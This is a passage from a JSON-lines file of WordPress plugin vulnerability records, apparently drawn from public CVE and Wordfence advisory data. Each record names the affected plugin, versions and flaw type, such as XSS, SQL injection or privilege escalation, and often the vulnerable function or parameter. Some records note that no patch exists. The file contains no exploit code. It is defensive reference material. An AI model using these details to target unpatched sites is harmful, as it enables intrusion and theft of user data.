replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4afc8de7-0d7e-4dee-972e-3eb707cd7b2b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4afc8de7-0d7e-4dee-972e-3eb707cd7b2b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beek-widget-extention\\\/trunk\\\/inc\\\/call-to-action.php?rev=1249743#L135\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beek-widget-extention\\\/trunk\\\/inc\\\/call-to-action.php?rev=1249743#L135\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9192","slug":"wp-video-robot","versionImpact":"1.20.0","description":"The WordPress Video Robot - The Ultimate Video Importer plugin for WordPress is vulnerable to privilege escalation due to insufficient validation on user meta that can be updated in the wpvr_rate_request_result() function in all versions up to, and including, 1.20.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to update their user meta on a WordPress site. This can be leveraged to update their capabilities to that of an administrator.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2da019d3-4aca-485a-aa0c-73728dc1e7c1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2da019d3-4aca-485a-aa0c-73728dc1e7c1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wordpress-video-robot-plugin\\\/8619739\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wordpress-video-robot-plugin\\\/8619739\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10663","slug":"ele-blog","versionImpact":"1.8","description":"The Eleblog \u2013 Elementor Blog And Magazine Addons plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the goodbye_form_callback() function in all versions up to, and including, 1.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to submit a deactivation reason.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ele-blog\\\/trunk\\\/inc\\\/class-ele-blog-quick-feedback.php#L350\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ele-blog\\\/trunk\\\/inc\\\/class-ele-blog-quick-feedback.php#L350\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f355d2c0-6133-4091-b900-1451ebba70c4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f355d2c0-6133-4091-b900-1451ebba70c4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11865","slug":"tabs-maker","versionImpact":"1.0","description":"The Tabs Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on tab descriptions. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tabs-maker\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tabs-maker\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/284c5646-7728-45bd-9479-483c806ca804?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/284c5646-7728-45bd-9479-483c806ca804?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12049","slug":"woo-ukrposhta","versionImpact":"1.17.11","description":"The Woo Ukrposhta plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'order', 'post', and 'idd' parameters in all versions up to, and including, 1.17.11 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-ukrposhta\\\/trunk\\\/admin\\\/partials\\\/edit.php#L43\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-ukrposhta\\\/trunk\\\/admin\\\/partials\\\/edit.php#L43\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-ukrposhta\\\/trunk\\\/admin\\\/partials\\\/edit-international.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-ukrposhta\\\/trunk\\\/admin\\\/partials\\\/edit-international.php#L71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-ukrposhta\\\/trunk\\\/admin\\\/partials\\\/morkvaup-plugin-invoices-page.php#L29\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-ukrposhta\\\/trunk\\\/admin\\\/partials\\\/morkvaup-plugin-invoices-page.php#L29\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-ukrposhta\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-ukrposhta\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e549e4c-9f2e-40a4-9b07-7edb34bc0c9f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e549e4c-9f2e-40a4-9b07-7edb34bc0c9f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13719","slug":"pepro-ultimate-invoice","versionImpact":"2.0.8","description":"The PeproDev Ultimate Invoice plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.0.8 via the invoicing viewer due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to view invoices for completed orders which can contain PII of users.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pepro-ultimate-invoice\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pepro-ultimate-invoice\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/46186f8d-e50c-476a-9480-b6121412474a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/46186f8d-e50c-476a-9480-b6121412474a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1504","slug":"post-lockdown","versionImpact":"4.0.2","description":"The Post Lockdown plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 4.0.2 via the 'pl_autocomplete' AJAX action due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract data from password protected, private, or draft posts that they should not have access to.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-lockdown\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-lockdown\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/447cef6f-fa2e-4087-946d-6e0214830ea9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/447cef6f-fa2e-4087-946d-6e0214830ea9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4672","slug":"offsprout-page-builder","description":"The Offsprout Page Builder plugin for WordPress is vulnerable to Privilege Escalation due to improper authorization placed on the permission_callback() function in versions 2.2.1 to 2.15.2. This makes it possible for authenticated attackers, with Contributor-level access and above, to read, create, update or delete any user meta, including flipping their own wp_capabilities to administrator and fully escalate their privileges.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/offsprout-page-builder\\\/tags\\\/2.15.2\\\/api\\\/class-offsprout-api-extensions.php#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/offsprout-page-builder\\\/tags\\\/2.15.2\\\/api\\\/class-offsprout-api-extensions.php#L5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/offsprout-page-builder\\\/tags\\\/2.15.2\\\/api\\\/class-offsprout-api-extensions.php#L514\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/offsprout-page-builder\\\/tags\\\/2.15.2\\\/api\\\/class-offsprout-api-extensions.php#L514\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/offsprout-page-builder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/offsprout-page-builder\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9269d18d-8d83-43ff-b777-ba8f58321e9e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9269d18d-8d83-43ff-b777-ba8f58321e9e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8399","slug":"mmm-unity-loader","versionImpact":"1.0","description":"The Mmm Unity Loader plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018attributes\u2019 parameter in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/mmm-unity-loader\\\/trunk\\\/mmm-unity-loader.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/mmm-unity-loader\\\/trunk\\\/mmm-unity-loader.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mmm-unity-loader\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mmm-unity-loader\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2cee1d75-278c-45c6-915d-60aae6a4d3a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2cee1d75-278c-45c6-915d-60aae6a4d3a2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0034","slug":"jetwidgets-for-elementor","versionImpact":"1.0.13","description":"The JetWidgets For Elementor WordPress plugin through 1.0.13 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ffbdb8a1-19c3-45e9-81b0-ad47a0791c4a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ffbdb8a1-19c3-45e9-81b0-ad47a0791c4a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1866","slug":"yourchannel","versionImpact":"1.2.3","description":"The YourChannel plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.3. This is due to missing or incorrect nonce validation on the clearKeys function. This makes it possible for unauthenticated attackers to reset the plugin's channel settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45851efe-2584-4b5e-8e4c-24f289d3bc32?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45851efe-2584-4b5e-8e4c-24f289d3bc32?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yourchannel\\\/trunk\\\/YourChannel.php?rev=2844975#L107\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yourchannel\\\/trunk\\\/YourChannel.php?rev=2844975#L107\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3051","slug":"page-builder-by-azexo","versionImpact":"1.27.133","description":"The Page Builder by AZEXO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'azh_post' shortcode in versions up to, and including, 1.27.133 due to insufficient input sanitization and output escaping. This makes it possible for contributor-level attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24486605-9324-4f19-9ca3-340d006432db?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24486605-9324-4f19-9ca3-340d006432db?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L2856\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L2856\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L2845\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L2845\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3320","slug":"wp-sticky-social","versionImpact":"1.0.1","description":"The WP Sticky Social  plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.1. This is due to missing nonce validation in the ~\/admin\/views\/admin.php file. This makes it possible for unauthenticated attackers to modify the plugin's settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a272e12b-97a2-421a-a703-3acce2ed8313?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a272e12b-97a2-421a-a703-3acce2ed8313?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2926150%40wp-sticky-social&new=2926150%40wp-sticky-social\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2926150%40wp-sticky-social&new=2926150%40wp-sticky-social\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3492","slug":"shopping-pages","versionImpact":"1.14","description":"The WP Shopping Pages WordPress plugin through 1.14 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/01b9b1c2-439e-44df-bf01-026cb13d7d40\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/01b9b1c2-439e-44df-bf01-026cb13d7d40\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7044","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.2","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via custom ID in all versions up to, and including, 5.9.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access and higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e770e98-3c13-4e37-b51b-4c39bce2cb42?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e770e98-3c13-4e37-b51b-4c39bce2cb42?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Extensions\\\/Wrapper_Link.php#L65\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Extensions\\\/Wrapper_Link.php#L65\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3013774\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Extensions\\\/Wrapper_Link.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3013774\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Extensions\\\/Wrapper_Link.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0821","slug":"cost-of-goods-for-woocommerce","versionImpact":"3.2.8","description":"The Cost of Goods Sold (COGS): Cost & Profit Calculator for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'section' parameter in all versions up to, and including, 3.2.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d13d072e-9c9c-4a32-b9f4-7d15dc704b50?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d13d072e-9c9c-4a32-b9f4-7d15dc704b50?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3037232%40cost-of-goods-for-woocommerce&new=3037232%40cost-of-goods-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3037232%40cost-of-goods-for-woocommerce&new=3037232%40cost-of-goods-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8731","slug":"leira-cron-jobs","versionImpact":"1.2.9","description":"The Cron Jobs plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.2.9. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f6da693-4610-4875-aa14-102809309b8d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f6da693-4610-4875-aa14-102809309b8d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/leira-cron-jobs\\\/trunk\\\/admin\\\/class-leira-cron-jobs-admin.php#L147\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/leira-cron-jobs\\\/trunk\\\/admin\\\/class-leira-cron-jobs-admin.php#L147\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8964","slug":"sirv","versionImpact":"7.2.9","description":"The Image Optimizer, Resizer and CDN \u2013 Sirv plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 7.2.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39b2435f-32a3-4158-a734-c21a0cab15be?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39b2435f-32a3-4158-a734-c21a0cab15be?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sirv\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sirv\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3162079\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3162079\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10112","slug":"simple-news","versionImpact":"2.8","description":"The Simple News plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'news' shortcode in all versions up to, and including, 2.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79147dad-4bce-40fb-b9c1-e211845251a0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79147dad-4bce-40fb-b9c1-e211845251a0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-news\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-news\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10587","slug":"funnelforms-free","versionImpact":"3.7.4.1","description":"The Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor \u2013 Funnelforms Free plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.7.4.1 via deserialization of untrusted input. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/funnelforms-free\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/funnelforms-free\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/701e6afe-08fa-49c7-a6da-cb266db07c48?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/701e6afe-08fa-49c7-a6da-cb266db07c48?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11855","slug":"koalendar-free-booking-widget","versionImpact":"1.0.2","description":"The Koalendar \u2013 Events & Appointments Booking Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018height\u2019 parameter in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/koalendar-free-booking-widget\\\/trunk\\\/koa-wordpress.php#L29\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/koalendar-free-booking-widget\\\/trunk\\\/koa-wordpress.php#L29\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/koalendar-free-booking-widget\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/koalendar-free-booking-widget\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbbbf5fe-0369-4de6-9b2f-957286b6f394?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbbbf5fe-0369-4de6-9b2f-957286b6f394?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11810","slug":"paygreen-payment-gateway","versionImpact":"1.0.26","description":"The PayGreen Payment Gateway plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'message_id' parameter in all versions up to, and including, 1.0.26 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/paygreen-payment-gateway\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/paygreen-payment-gateway\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e5438f82-2428-44ba-a7c8-e34d80804063?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e5438f82-2428-44ba-a7c8-e34d80804063?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13712","slug":"pollin","versionImpact":"1.01.1","description":"The Pollin plugin for WordPress is vulnerable to SQL Injection via the 'question' parameter in all versions up to, and including, 1.01.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pollin\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pollin\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d4a463b-e447-4fd0-a8df-284ecd6cd975?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d4a463b-e447-4fd0-a8df-284ecd6cd975?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1481","slug":"shortcode-cleaner-lite","versionImpact":"1.0.9","description":"The Shortcode Cleaner Lite plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the download_backup() function in all versions up to, and including, 1.0.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to export arbitrary options.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcode-cleaner-lite\\\/trunk\\\/vendor\\\/codestar\\\/codestar\\\/core\\\/Module\\\/Export.php#L53\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcode-cleaner-lite\\\/trunk\\\/vendor\\\/codestar\\\/codestar\\\/core\\\/Module\\\/Export.php#L53\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/shortcode-cleaner-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/shortcode-cleaner-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/15613da5-f900-4a33-8eec-6c9e52ed30fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/15613da5-f900-4a33-8eec-6c9e52ed30fc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
